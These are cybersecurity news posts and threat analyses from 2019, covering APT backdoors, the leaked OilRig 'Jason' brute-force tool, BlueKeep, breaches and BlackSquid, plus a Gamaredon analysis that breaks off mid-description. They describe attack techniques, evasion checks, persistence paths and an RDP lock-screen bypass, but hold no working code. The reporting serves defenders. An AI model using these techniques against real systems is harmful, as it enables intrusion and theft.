“In June 2018, we came across an unusual set of samples spreading throughout South and Southeast Asian countries targeting diplomatic, government and military entities. The campaign, which may have started as far back as 2012, featured a multi-stage approach and was dubbed EasternRoppels.” reads the analysis published by the expert. “The actor behind this campaign, believed to be related to the notorious PLATINUM APT group, used an elaborate, previously unseen steganographic technique to conceal communication.”

The attack chain starts with WMI subscriptions to run an initial PowerShell downloader and fetch another small PowerShell backdoor for system fingerprinting and downloading additional code. 

The initial WMI PowerShell scripts observed in different attacks were using different hardcoded command and control (C&C) IP addresses, different encryption keys, salt for encryption and different active hours.

Threat actor located the C&C addresses on free hosting services, they used a large number of Dropbox accounts for storing the malicious code and store exfiltrated data.

Kaspersky spotted a backdoor while investigating another threat, further analysis allowed its experts to discover that it was a second stage malware used in one of the Platinum campaigns.

“We were able to find a backdoor that was implemented as a DLL and worked as a WinSock NSP (Nameservice Provider) to survive a reboot. The backdoor shares several features with the PowerShell backdoor described above: it has hardcoded active hours, it uses free domains as C&C addresses, etc.” continues Kaspersky.

The researchers discovered that in the two attacks, it was used the same domain to store exfiltrated data. The analysis of the encrypted files used in the second stage revealed a previously undiscovered backdoor associated with the Platinum group. 

Hackers used a dropper to install the steganography backdoor, the malicious code creates directories for the backdoor and saves backdoor-related files in these folders. Then the dropper runs the backdoor, implements a persistence mechanism, and then removes itself. 

Once the backdoor is installed on a target machine, it will connect to C&C server and downloads an HTML page that contains embedded commands that are encrypted with a key that is also embedded into the page.

“The page contains embedded commands that are encrypted with an encryption key, also embedded into the page. The embedded data is encoded with two steganography techniques and placed inside the <–1234567890> tag (see below). ” continues the analysis.

Platinum

One of the steganography techniques used by the threat actors is based on the principle that HTML is indifferent to the order of tag attributes. The malicious code is able to decode line by line and collects an encryption key for the encoded data that are embedded in the page right after the HTML tags. Data are encoded with a second steganography technique.

The backdoor supports several commands, it could upload, download and execute files, handle requests for lists of processes and directories, upgrade and uninstall itself, and change the configuration file. 

The analysis also revealed another tool used as a configuration manager that allows creating configuration and command files for the backdoors. The utility is able to configure more than 150 options.

Experts also discovered a P2P backdoor that has many similarities with the previous one, it uses the same command names and the same names of options in the configuration files. 

“However, there are significant differences, too. The new backdoor actively uses many more of the options from the config, supports more commands, is capable of interacting with other infected victims and connecting them into a network (see the “Commands” section for details), and works with the C&C server in a different way. In addition, this backdoor actively uses logging: we found a log file dating back to 2012 on one victim PC.” continues the analysis.

The backdoor is able to sniff network traffic without keeping any socket in listening mode, it creates a listening socket every time someone attempts to connect.

According to the experts, the backdoor might have been active since at least 2012. 

“We have discovered a new attack by this group and noted that the actors are still working on improving their malicious utility and using new techniques for making the APT stealthier.” concludes Kaspersky. ” Finally, based on the custom cryptor used by the actors, we have been able to attribute this attack to the notorious PLATINUM group, which means this group is still active. “

Pierluigi Paganini

(SecurityAffairs – PLATINUM APT, hacking)

The post Platinum APT and leverages steganography to hide C2 communications appeared first on Security Affairs.

Analyzing the APT34’s Jason project

Security expert Marco Ramilli has analyzed the recently leaked APT34 hacking tool tracked as Jason – Exchange Mail BF.

Today I want to share a quick analysis on a new leaked APT34 Tool in order to track similarities between APT34 public available toolsets. This time is the APT34 Jason – Exchange Mail BF project to be leaked by Lab Dookhtegan on June 3 2019.

Original Leak

Context

According to FireEye, APT34 has been active since 2014. APT 34, also referred to as “OilRig” or Helix Kitten, has been known to target regional corporations and industries. Although there was information about APT34 prior to 2019, a series of leaks on the website Telegram by an individual named “Lab Dookhtegan”, including Jason project, exposed many names and activities of the organization.

“APT34 conducts cyber espionage on behalf of Iran. Iran seeks to diminish the capabilities of other regional powers to create leverage and better establish itself. This strategy is especially important against nations it sees as a threat to its regional power such as Saudi Arabia and the United Arab Emirates.”

Michael Lortz

Analysis

Jason is a graphic tool implemented to perform Microsoft exchange account brute-force in order to “harvest” the highest possible emails and accounts information. Distributed in a ZIP container (a copy is available here) the interface is quite intuitive: the Microsoft exchange address and its version shall be provided (even if in the code a DNS-domain discovery mode function is available). Three brute-force methods could be selected: EWS (Exchange Web Service), OAB (Offline Address Book) or both (All). Username and password list can be selected (included in the distributed ZIP file) and threads number should be provided in order to optimize the attack balance.

Jason Project GUI

Deflating the ZIP container three artifacts are facing out. Jason.exe representing the graphic user interface and the main visible tool. Microsoft.Exchange.WebService.dll which includes the real functionalities used by Jason.exe, it’s a Microsoft developed library, PassSamplewhich includes some patterns implementation of possible Passwords (ie.[User@first]@@[user@first]123) and a folder named PasswordPatterswhich includes building blocks for password guessing. For example it wraps up a file called Year.txt including numbers from 1900 to 2020, a file called numspecial.txt including special numbers patterns and special chars patterns, a file called num4.txt including numbers from 0 to 999 and from 0002 (why not 0001 or 0000?) to 9998 (why not 9999?) and finally a file called num4special.txt including special number patters like: 1234,7890,0707, and so on and so forth.

Leaked ZIP content

Digging a little bit into the two Microsoft artifacts we might find out that both of them ( Jason.exe and Microsoft.Exchange.WebService.dll) have been written using .NET framework. The used .dll provides a managed interface for developing .NET client applications that use EWS. By using the EWS Managed API, the developer can access almost all the information stored in an Office 365, Exchange Online, or Exchange Server mailbox. The attacker used an old version of Microsoft.Exchange.WebService.dll tagged as 15.0.0.0 which according to Microsoft documentation dates back to 2012.

WebService.dll assemply version

The last available Microsoft.Exchange.WebService.dll dates back to 2015, as shown in the following image, which might suggest a Jason dating period, even if it’s not an irrefutable evidence.

Last Microsoft Exchange WebServices dll version dates to 2015

Analyzing the reversed byte-code a real eye catcher (at least in my persona point of view) is in the “exception securities” that have been placed. In other words, the developer used many checks such as: variable checks, Nullbytes avoidance, objects indexes and object key checks in order to reduce the probability of not managed software exceptions. These “exception protections” are usually adopted in two main scenarios: (i) the end-user is not a super “techy” guy, so he might end-up with some unexpected conditions or (ii) the attacker is a professional developer who is trained to write product oriented code and not simple working software (which is what attackers usually do). The following images show a couple of code snippets in where the developer decided to protect codes from unexpected user behavior.

Basic exception prevention 1
Basic exception prevention 2

Comparing the code style with my previous analyses on APT34 (OilRig) which you might find here and here, we might observe a similar code protection. Even if the code language is different the similarity in the basic exception prevention from Jason and -for example- the “ICAP.py script injection” function is very close. Another weak similarity is in the logging style. Jason and -for example- Glimpse project have a similar file logging function which includes string concatenation using special operators (no “flying casting” or “safe conversions”, ie: “%s”) and one line file logging into function focal points.

I am aware that these are weak similarities and there is no additional evidence or ties with previous leaked APT34 except for the trusted source (Lab Dookhtegan), so I am not giving any personal attribution since it gets very hard to attribute Jason directly to APT34 for what is known.

On the other hand Jason project doesn’t share the main source code language with previous APT34 analyses, it doesn’t include DNS tricks and or DNS usage evidences, it doesn’t include distinguishing patterns or language mistakes, it have been recompiled on January 2019 but using older technology. As already discussed it shares just few code style similarities with Glimpse and WebMask.

Additional technical details, including Yara Rules and IoCs, are reported in the original analysis published by Marco Ramilli on his blog:

https://marcoramilli.com/2019/06/06/apt34-jason-project/

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

I do have experience in security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cybersecurity experiences by diving into SCADA security issues with some of the biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence center I’ve ever experienced! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – Jason, APT34)



The post Analyzing the APT34’s Jason project appeared first on Security Affairs.

0patch experts released unofficial Patch Available for Recent Windows 10 Task Scheduler Zero-Day

Experts at 0patch released an unofficial patch to address a recently disclosed zero-day vulnerability in Windows 10 Task Scheduler. 

Security experts at 0patch released an unofficial patch to address a recently disclosed zero-day vulnerability in Windows 10 Task Scheduler. 

A couple of weeks ago, researcher SandboxEscaper released a working exploit for the vulnerability, Like the Windows zero-day disclosed in August, this new issue affects Microsoft Windows Task Scheduler.

SandboxEscaper demonstrated that is possible to trigger the Windows zero-day by using malformed legacy tasks (.JOB format) and importing them in the Task Scheduler utility. and they can still be added to newer versions of the operating system.

Every JOB file is imported by the Task Scheduler with arbitrary DACL (discretionary access control list) control rights.

The experts pointed out that in the absence of the DACL, the system grants any user full access to the file.

The researcher explained that in order to trigger the flaw it is necessary to import legacy task files into the Task Scheduler on Windows 10.

Will Dormann, vulnerability analyst at CERT/CC, confirmed that the Windows zero-day works on a fully patched (May 2019) Windows 10 x86 system.

“Microsoft Windows contains a privilege escalation vulnerability in the way that theTask Scheduler SetJobFileSecurityByName() function is used, which can allow an authenticated attacker to gain SYSTEM privileges on an affected system.” wrote Dormann.

Dormann was able to reproduce the issue Recompiling the code on 64-bit Windows 10 and Windows Server 2016 and 2019, only on Windows 8 and 7 it was not possible to reproduce it.

“We have confirmed that the public exploit code functions reliably on 32- and 64-bit Windows 10 platforms, as well as Windows Server 2016 and Windows Server 2019.” continues Dormann. “While Windows 8 still contains this vulnerability, exploitation using the publicly-described technique is limited to files where the current user has write access, in our testing,”

According to experts at 0patch, only legacy schtasks.exe can be abused to escalate privileges. Unlike legacy schtasks.exe, the modern Task Scheduler would require the user setting the task to modify a file to have write permissions to that file. 

“After some head-scratching, we remembered that this attack only works with the legacy schtasks.exe, and not with the new one. Could it be that the old schtasks.exe was calling some other RPC function than _SchSetRpcSecurity, which then in turn called _SchSetRpcSecurity via RPC?” reads the analysis published by 0patch.

Task Manager, zero-day

The researchers discovered that the process, which runs with attacker privileges, calls RPC endpoint taskcomp!SASetAccountInformation in Task Scheduler’s process svchost.exe (running as Local System), which in turn calls RPC endpoint schedsvc!_SchRpcSetSecurity in the same svchost.exe (still running as Local System). 

Experts discovered that taskcomp.dll has Local System privileges and impersonates self (Local System) to enable the SeRestorePrivilege privilege that is needed for it to set DACL and ownership on any file.

we believe it was actually an error to impersonate self in taskcomp.dll instead of impersonating the client. The latter would in fact allow the security check in schedsvc!_SchRpcSetSecurity to perform correctly and work as intended on a regular file as well as on a hard-linked system file (correctly failing when invoked by a low-privileged user).” continues 0patch.

“We therefore decided to replace self-impersonation with client-impersonation, and to do that, we removed the call to ImpersonateSalfWithPrivilege and injected a call to RpcImpersonateClient in its place.”

Unfortunately, the exploit was still working because another RPC call was made to SchRpcSetSecurityin taskcomp.dll when the first RPC call fails. Then the experts at 0patch completely removed the call to SetSecurity. 

“After that, we got the desired behavior: The legacy schtasks.exe was behaving correctly when creating a new task from a job file, and […] the hard link trick no longer worked because the Task Scheduler process correctly identified the caller and determined that it doesn’t have sufficient permissions to change DACL or ownership on a system file,” continues 0patch. 

0patch released a micropatch to address the vulnerability on all Windows 10 systems running the 0patch Agent. Researchers explained that the micropatch does not modify schedsvc.dll, this means that non-legacy Task Scheduler is not affected. 

“As always, if you have 0patch Agent installed and registered, this micropatch is already on your computer – and applied to taskcomp.dll in your Task Scheduler service. If you don’t have the 0patch Agent yet, you can register a 0patch account and install it to get this micropatch applied.” concludes 0patch.

“Following our guidelines on which patches to provide for free, this micropatch affects many home and education users, and is therefore included in both FREE and PRO 0patch license until Microsoft provides an official fix. After that the micropatch will only be included in the PRO license.”

The micropatch released 0patch works on fully updated:

  1. Windows 10 version 1809 32bit
  2. Windows 10 version 1809 64bit
  3. Windows Server 2019

Pierluigi Paganini

(SecurityAffairs – Task Scheduler, zero-day)

The post 0patch experts released unofficial Patch Available for Recent Windows 10 Task Scheduler Zero-Day appeared first on Security Affairs.

NSA urges Windows Users and admins to Patch BlueKeep flaw

The National Security Agency (NSA) is urging Windows users and administrators to install security updates to address BlueKeep flaw (aka CVE-2019-0708).

Last week Microsoft issued a second security advisory to warn users of older Windows OS versions to update their systems in order to patch the remote code execution vulnerability dubbed BlueKeep.

Now the National Security Agency (NSA) is also urging Windows users and administrators to install security updates to address BlueKeep flaw (aka CVE-2019-0708).

The vulnerability, tracked as CVE-2019-0708, impacts the Windows Remote Desktop Services (RDS) and was addressed by Microsoft with May 2019 Patch Tuesday updates. BlueKeep is a wormable flaw that can be exploited by malware authors to create malicious code with WannaCry capabilities.

As explained by Microsoft, this vulnerability could be exploited by malware with wormable capabilities, it could be exploited without user interaction, making it possible for malware to spread in an uncontrolled way into the target networks.

Many security experts have already developed their own exploit code for this issue without publicly disclosing it for obvious reasons.

Microsoft has released patches for Windows 7, Server 2008, XP and Server 2003. Windows 7 and Server 2008 users can prevent unauthenticated attacks by enabling Network Level Authentication (NLA), and the threat can also be mitigated by blocking TCP port 3389.

Security experts believe it is a matter of time before threat actors will start exploiting it in the wild. A few hours ago, the esecurity researcher Zǝɹosum0x0 announced to have has developed a module for the popular Metasploit penetration testing framework to exploit the critical BlueKeep flaw.

The Metasploit module could be used to trigger the BlueKeep flaw on vulnerable Windows XP, 7, and Server 2008, but the expert has not publicly disclosed it to avoid threat actors abusing it.

The National Security Agency is urging Microsoft Windows administrators and users to ensure they are using a patched and updated system in the face of growing threats. Recent warnings by Microsoft stressed the importance of installing patches to address a protocol vulnerability in older versions of Windows ” reads the NSA’s advisory.

“This is the type of vulnerability that malicious cyber actors frequently exploit through the use of software code that specifically targets the vulnerability. For example, the vulnerability could be exploited to conduct denial of service attacks. It is likely only a matter of time before remote exploitation code is widely available for this vulnerability. NSA is concerned that malicious cyber actors will use the vulnerability in ransomware and exploit kits containing other known exploits, increasing capabilities against other unpatched systems.

NSA urges everyone to invest the time and resources to know your network and run supported operating systems with the latest patches.”

BlueKeep NSA

In addition to installing the patches from Microsoft, Windows users can mitigate attacks:

  • Block TCP Port 3389 at your firewalls, especially any perimeter firewalls exposed to the internet. This port is used in RDP protocol and will block attempts to establish a connection.
  • Enable Network Level Authentication. This security improvement requires attackers to have valid credentials to perform remote code authentication.
  • Disable remote Desktop Services if they are not required. Disabling unused and unneeded services helps reduce exposure to security vulnerabilities overall and is a best practice even without the BlueKeep threat.

Pierluigi Paganini

(SecurityAffairs – BlueKeep, hacking)

The post NSA urges Windows Users and admins to Patch BlueKeep flaw appeared first on Security Affairs.

Tens of Million patients impacted by the AMCA data breach

Outsourced silos of personal info raided, at least 200,000 payment details swiped

Recovery agency for patient collections American Medical Collection Agency (AMCA) suffered a data breach that could impact many of its customers.

American Medical Collection Agency (AMCA) suffered a data breach that could impact many of its customers, the company still hasn’t disclosed details.

filing with the U.S. Securities and Exchange Commission (SEC) Quest revealed that the attackers broke into the web payment portal of the American Medical Collection Agency between August 1, 2018 and March 30, 2019.

AMCA provides services to numerous firms, including the revenue cycle management provider Optum360, medical testing firm Quest Diagnostics, and LabCorp.

AMCA databreach

The security breach has impacted roughly 12 million of Quest Diagnostics‘ patients and roughly 7.7 of LabCorp patients. After the disclosure of the incident, Labcorp announced the terminations of business activities with AMCA and Quest Diagnostics has suspended sending collection requests to AMCA.

The hackers broke into company databases containing millions of medical test lab patients’ personal and payment information.

“LabCorp has referred approximately 7.7 million consumers to AMCA whose data was stored in the affected AMCA system. AMCA’s affected system included information provided by LabCorp.” reads the Form 8-K filing.

“That information could include first and last name, date of birth, address, phone, date of service, provider, and balance information. AMCA’s affected system also included credit card or bank account information that was provided by the consumer to AMCA (for those who sought to pay their balance). LabCorp provided no ordered test, laboratory results, or diagnostic information to AMCA.”

AMCA confirmed that Social Security Numbers and insurance identification information are maintained for LabCorp consumers.

AMCA also informed LabCorp that it is sending security breach notices to approximately 200,000 LabCorp consumers whose financial data may have been compromised.

According to DataBreaches.net, stolen data are already fueling dark web, in fact researchers at Gemini Advisory, discovered the offer of payment card information for roughly 200,000 individuals likely from AMCA’s databases.

“The breach had been discovered by Gemini Advisory, who informed this site that they had found approximately 200,000 patients’ payment card info for sale on a well-known marketplace. The cards had apparently been compromised between September, 2018 and the beginning of March, 2019.” states DataBreaches.net.

Pierluigi Paganini

(SecurityAffairs – American Medical Collection Agency, hacking)

The post Tens of Million patients impacted by the AMCA data breach appeared first on Security Affairs.

The Australian National University suffered a major, sophisticated attack

The Australian National University suffered a vast hack carried out by a “sophisticated operator” who gained access to 19 years of sensitive data.

The Australian National University was the victim of a vast hack carried out by a “sophisticated operator” who gained access to 19 years of sensitive data.

The top Australian university is known for its intense collaboration with Australia’s government and the national security services.

The university has estimated that over 200,000 people have been affected by the security breach. Vice-chancellor Brian Schmidt sent a message to the staff and students to notify them of the incident, he explained that threat actors illegally accessed the university’s systems in late 2018.

“We believe there was unauthorised access to significant amounts of personal staff, student and visitor data extending back 19 years,” Schmidt said. “We have no evidence that research work has been affected,”

“In late 2018, a sophisticated operator accessed our systems illegally. We detected the breach two weeks ago,”

Schmidt also added that exposed data included names, addresses, dates of birth, phone numbers, personal email addresses and emergency contact details, tax file numbers, payroll information, bank account details, passport details, and student academic records.

Financial data, medical records, police checks, workers’ compensation, vehicle registration numbers have not been affected.

The Australian National University reported the incident to the authorities and it partners and is currently investigating the attack with their support.

“We’re working closely with Australian government security agencies and industry security partners to investigate further.” added Schmidt.

“The University has taken immediate precautions to further strengthen our IT security and is working continuously to build on these precautions to reduce the risk of future intrusion.”

Universities are a privileged target for hackers, especially nation-state actors interested in spying on advanced research projects.

In June 2018, Chinese hackers breached into the systems of the Australian National University (ANU) and according to the experts they remained in its infrastructure also after the discovery of the intrusion.

This time the authorities haven’t attributed the intrusion to a specific actor, but the events suggest the involvement of a sophisticated cyberespionage group.

Australian entities were hit by several major attacks in the last years, in February, hackers broke into Australia’s Parliament Computer Network and this is just the last hack in order of time.

in October 2016 a report published by the Australian Cyber Security Centre confirmed the Australian Bureau of Meteorology hack was powered by foreign cyber spies.

In December 2015 the Australian Broadcasting Corporation (ABC) revealed that a supercomputer operated by the Australian Bureau of Meteorology (BoM) was hit by a cyber attack. The Bureau of Meteorology is Australia’s national weather, climate, and water agency, it is the analog of the USA’s National Weather Service.

The supercomputer of the Australian Bureau of Meteorology targeted by the hackers is also used to provide weather data to defense agencies, its disclosure could give a significant advantage to a persistent attacker for numerous reasons.

Initial media reports blamed China for the cyber attack, in 2013 Chinese hackers were accused by authorities of stealing the top-secret documents and projects of Australia’s new intelligence agency headquarters.

Is China behid the last attack on the Australian National University?

Pierluigi Paganini

(SecurityAffairs – Australian National University, hacking)

The post The Australian National University suffered a major, sophisticated attack appeared first on Security Affairs.

Expert developed a MetaSploit module for the BlueKeep flaw

A security expert has developed a Metasploit module to exploit the critical BlueKeep vulnerability and get remote code execution.

The security researcher Zǝɹosum0x0 has developed a module for the popular Metasploit penetration testing framework to exploit the critical BlueKeep flaw.

The vulnerability, tracked as CVE-2019-0708, impacts the Windows Remote Desktop Services (RDS) and was addressed by Microsoft with May 2019 Patch Tuesday updates. BlueKeep is a wormable flaw that can be exploited by malware authors to create malicious code with WannaCry capabilities.

As explained by Microsoft, this vulnerability could be exploited by malware with wormable capabilities, it could be exploited without user interaction, making it possible for malware to spread in an uncontrolled way into the target networks.

Many security experts have already developed their own exploit code for this issue without publicly disclosing it for obvious reasons.

Microsoft has released patches for Windows 7, Server 2008, XP and Server 2003. Windows 7 and Server 2008 users can prevent unauthenticated attacks by enabling Network Level Authentication (NLA), and the threat can also be mitigated by blocking TCP port 3389.

The Metasploit module could be used to trigger the BlueKeep flaw on vulnerable Windows XP, 7, and Server 2008, but the expert has not publicly disclosed it to avoid threat actors abusing it.

Unfortunately, it has been determined that roughly one million devices exposed online are vulnerable to attacks exploiting the BlueKeep Windows vulnerability and hackers are ready to hit them.

BlueKeep

Zǝɹosum0x0 also published a video PoC that shows how to exploit the BlueKeep vulnerability on a Windows 2008 system.

According to Zǝɹosum0x0, the module could be used also against machines running on Windows 7 and Server 2008 R2.

This Metasploit module doesn’t work against Windows Server 2003.

Zǝɹosum0x0 also developed a scanner Metasploit module for the CVE-2019-0708 BlueKeep RCE vulnerability.

At the end of May, Microsoft issued a second warning for users of older Windows OS versions to update their systems in order to patch the remote code execution vulnerability dubbed BlueKeep.

The NSA also issued an alert to urge users to install the security patches to address the BlueKeep flaw.

“The National Security Agency is urging Microsoft Windows administrators and users to ensure they are using a patched and updated system in the face of growing threats. Recent warnings by Microsoft stressed the importance of installing patches to address a protocol vulnerability in older versions of Windows ” reads the NSA’s advisory.

“This is the type of vulnerability that malicious cyber actors frequently exploit through the use of software code that specifically targets the vulnerability. For example, the vulnerability could be exploited to conduct denial of service attacks. It is likely only a matter of time before remote exploitation code is widely available for this vulnerability. NSA is concerned that malicious cyber actors will use the vulnerability in ransomware and exploit kits containing other known exploits, increasing capabilities against other unpatched systems.

NSA urges everyone to invest the time and resources to know your network and run supported operating systems with the latest patches.”

Pierluigi Paganini

(SecurityAffairs – Metasploit, hacking)


The post Expert developed a MetaSploit module for the BlueKeep flaw appeared first on Security Affairs.

BlackSquid malware uses multiple exploits to drop cryptocurrency miners

A new piece of malware appeared in the threat landscape, dubbed BlackSquid it targets web servers with several exploits to deliver cryptocurrency miners.

Security experts at Trend Micro have discovered a new Monero cryptomining miner, dubbed BlackSquid, that is targeting web servers, network drives, and removable drives.

The new piece of malware leverages many exploits to compromise target systems and implements evasion techniques to avoid detection.

According to the experts, BlackSquid has worm-like propagation capabilities and it can be used to launch brute-force attacks.

“This malware, which we named BlackSquid after the registries created and main component file names, is particularly dangerous for several reasons.” states Trend Micro. “It employs anti-virtualization, anti-debugging, and anti-sandboxing methods to determine whether to continue with installation or not. It also has wormlike behavior for lateral propagation.”

The peculiarity of the BlackSquid malware is the employment of a set of the most dangerous exploits

While many forms of malicious code will employ one or two exploits for known vulnerabilities in popular systems, BlackSquid differs in this regard. 

The list of exploits used by the malware includes EternalBlue, DoublePulsar; exploits for CVE-2014-6287, Tomcat arbitrary file upload vulnerability CVE-2017-12615, CVE-2017-8464; and three ThinkPHP exploits for different versions of the framework.

The threat is delivered via infected webpages, exploits, or through removable network drives.

BlackSquid leverages the GetTickCount API to randomly select IP addresses of a web server and to attempt to infect them.

The malware implements anti-virtualization, anti-debugging, and anti-sandboxing methods to determine whether to deliver the miner or not.

“Simultaneous with its attacks, BlackSquid also downloads and executes two XMRig cryptocurrency-mining components.! continues the analysis. “The miner in resource is the primary miner used, but it also determines if the targeted system has a video card. If the system checks for Nvidia and AMD video cards using WQL (WMI Query Language, where WMI stands for Windows Management Instrumentation), the malware downloads the second component into the system to mine for graphics processing unit (GPU) resource.”

The malware halts the infection routine if at least one of the following conditions is met:

  • The victim’s username is included in a list of common sandbox usernames:
  • The disk drive model is equal to one included in a specific list;
  • The device driver, process, and/or dynamic link library is one of a specific list used by the malicious code.

BlackSquid exploits the EternalBlue-DoublePulsar exploits (MS17-010 SMB RCE exploit) to propagate through the target network. The malware uses the remote code execution (RCE) flaw to gain the same user rights as the local system user.

If the infected system has a video card such as Nvidia and AMD video cards using WQL (WMI Query Language, where WMI stands for Windows Management Instrumentation), the malicious code downloads a second component into the system to mine for graphics processing unit (GPU) resource.

Trend Micro says that the majority of BlackSquid attacks have, so far, been detected in Thailand and the United States. The last week of May is the most active period on record.

The presence of coding errors and skipped routine suggests that BlackSquid is still in the process of development and testing.

“Given its evasion techniques and the attacks it is capable of, BlackSquid is a sophisticated piece of malware that may cause significant damage to the systems it infects. If successful, this malware may enable an attacker to escalate unauthorized access and privileges, steal proprietary information, render hardware and software useless, or launch attacks on an organization (or even from an organization into another).” concludes Trend Micro.

“But considering the erroneous code and purposely skipped routines, we also think that the cybercriminals behind this malware are likely in the development and testing stages;”

Pierluigi Paganini

(SecurityAffairs – BlackSquid, hacking)

The post BlackSquid malware uses multiple exploits to drop cryptocurrency miners appeared first on Security Affairs.

CVE-2019-9510 flaw allows hackers to bypass Windows lock screen on RDP sessions

A security expert disclosed technical details of a new unpatched vulnerability (CVE-2019-9510) that affects Microsoft Windows Remote Desktop Protocol (RDP).

Security expert Joe Tammariello of Carnegie Mellon University Software Engineering Institute (SEI), discovered a new unpatched vulnerability in Microsoft Windows Remote Desktop Protocol (RDP).

The flaw, tracked as CVE-2019-9510, could be exploited by client-side attackers to bypass the lock screen on remote desktop (RD) sessions.

In order to exploit the flaw, the attacker requires physical access to a targeted system, for this reason, it received a CVSS score of 4.6 (medium severity). The flaw affects versions of Windows starting with Windows 10 1803 and Server 2019.

The vulnerability resides in the way Microsoft Windows Remote Desktop feature requires clients to authenticate with Network Level Authentication (NLA).

“Microsoft Windows RDP Network Level Authentication can allow an attacker to bypass the lock screen on remote sessions.” reads the advisory published by the CERT/CC.

“Starting with Windows 10 1803 and Windows Server 2019, Windows RDP handling of NLA-based RDP sessions has changed in a way that can cause unexpected behavior with respect to session locking. If a network anomaly triggers a temporary RDP disconnect, upon automatic reconnection the RDP session will be restored to an unlocked state, regardless of how the remote system was left. “

When a network anomaly occurs it could trigger a temporary RDP disconnect, but upon automatic reconnection the RDP session will be restored to an unlocked state. The RDP session will be restored without considering the status of the remote system before the disconnection. For example, consider the following steps:

Below the attack scenario described by the CERT:

  • User connects to remote Windows 10 1803 or Server 2019 or newer system using RDP.
  • User locks remote desktop session.
  • User leaves the physical vicinity of the system being used as an RDP client

An attacker can interrupt the network connectivity of the RDP client system, this will cause the session with the remote system being unlocked without providing credentials.

The advisory published by the CERT/CC states that two-factor authentication systems that integrate with the Windows login screen (i.e. Duo Security MFA) could be bypassed exploiting the CVE-2019-9510 flaw.

“Two-factor authentication systems that integrate with the Windows login screen, such as Duo Security MFA, are also bypassed using this mechanism. Any login banners enforced by an organization will also be bypassed.” continues the advisory.

The CERT/CC suggest the following workarounds:

  • Lock the local system as opposed to the remote system.
  • RDP sessions should be disconnected rather than locked to invalidate the current session and prevent an automatic RDP session reconnection without credentials.

Tammariello reported the flaw to Microsoft on April 19, but the company did not acknowledge the flaw

“[The] behavior does not meet the Microsoft Security Servicing Criteria for Windows,” states the company.

Pierluigi Paganini

(SecurityAffairs – RDP, CVE-2019-9510)

The post CVE-2019-9510 flaw allows hackers to bypass Windows lock screen on RDP sessions appeared first on Security Affairs.

OilRig’s Jason email hacking tool leaked online

A few hours ago, a new email hacking tool dubbed Jason and associated with the OilRig APT group was leaked through the same Telegram channel used to leak other tools.

A new email hacking tool associated with the Iran-linked OilRig APT group was leaked through the same Telegram channel that in April leaked the source code of 6 tools used by the crew.

In April, a hacker group that goes online with the name Lab Dookhtegan have disclosed details about operations conducted by the Iran-linked cyber-espionage group tracked as OilRigAPT34, and HelixKitten. The Lab Dookhtegan hackers used a Telegram channel to dump information about the OilRig infrastructure, revealing details about its hacking tools, members, and operations. The hackers also disclosed IP addresses and domains involved in operations conducted by the group over the years.

Now the group released a tool that was allegedly used by OilRig “for hacking emails and stealing information.”

OilRig is an Iran-linked APT group that has been around since at least 2014, it targeted mainly organizations in the financial, government, energy, telecoms and chemical sectors in the United States and Middle Eastern countries.

The new tool could be used to hijack Microsoft Exchange email accounts, it was dubbed Jason and currently, it is has a detection rate of 0 on VirusTotal.

Jason email hijacking

The Jason email hijacking tool works is used by threat actors to carry out brute-force attacks using a dictionary of password samples and four text files containing numerical patterns.

According to VirusTotal the sample was compiled in 2015 and at the time of writing it is detected only by 7 out of 71 antivirus solutions.

Jason email hijacking detection

The leak of the hacking tools allowed security firms to analyze them and implements the rules for their detection.

On the other side, hackers could use these tools to carry out the attacks making hard their attribution.

You can find further info on the Jason tool in a blog post published by Omri Segev Moyal, the co-founder at Minerva Labs.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – OilRig, Jason email hijacking tool)


The post OilRig’s Jason email hacking tool leaked online appeared first on Security Affairs.

A month later Gamaredon is still active in Eastern Europe

Gamaredon continues to target Ukraine, Yoroi-Cybaze ZLab spotted a new suspicious activity potentially linked to the popular APT group

Introduction

The Gamaredon attacks against Ukraine don’t seem to have stopped. After a month since our last report we spotted a new suspicious email potentially linked to the Gamaredon group. The group was first discovered by Symantec and TrendMicro in 2015 but evidence of its activities has been dated back to 2013. During recent times, Gamaredon is targeting the Ukrainian military and law enforcement sectors too, as officially stated by the CERT-UA.

Cybaze-Yoroi ZLAB team dissected the artifact recovered from their latest attack to figure out evolution or changes in the threat actor TTPs.

Technical Analysis

Figure 1. Malicious e-mail 

The infection chain is composed by different stages of password protected SFX (self extracting archive), each containing vbs or batch scripts.

At the final stage of this malicious chain, we found a customized version of UltraVNC, a well known off-the-shelf tool for remote administration, modified by the Group and configured to connect to their command and control infrastructure. Despite its apparent triviality, the Matryoshka of SFX archives reached a low detection rate, making it effective.

Stage 1

Hash5555a3292bc6b6e7cb61bc8748b21c475b560635d8b0cc9686b319736c1d828e
ThreatGamaredon Pteranodon implant
Brief DescriptionSFX file
Ssdeep24576:PXwOrRsTyuURQFsVhIe74lpyevrM4vZxn6k1gQ Guo:PgwRAyuURQ2/1YpyeT7ok8

Table 1. Information about initial SFX file

The mail attachment is a RAR archive containing a folder named “suspected” in Ukrainan and a single suspicious file with “.scr” extension. At first glance, it is possible to notice the PowerPoint icon associated to the file, normally not belonging to .scr files.

Figure 2. Content of malicious e-mail
Figure 3. Low AV detection of SFX malware

The file has a very low detection rate on VirusTotal platform: only four AV engines are able to identify it as malicious and only on engine understands it may be associated to the Gamaredon implant.

After a quick analysis, the real nature of the .scr file emerges: it is a Self Extracting Archive containing all the files in Figure 4.

They are extracted into “%TEMP%\7ZipSfx.000\” and the first command to be executed is “15003.cmd”, which firstly checks for the presence of malware analysis tools. If it detects the presence of Wireshark or Procexp tools, it kill itself. Otherwise, it copies:

Figure 4. Content of SFX
  • the “11439” file in “%USERNAME%\winupd.exe”
  • the “28509” file in “%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\winupd.lnk” pointing to the previous executable and granting persistence to machine reboot
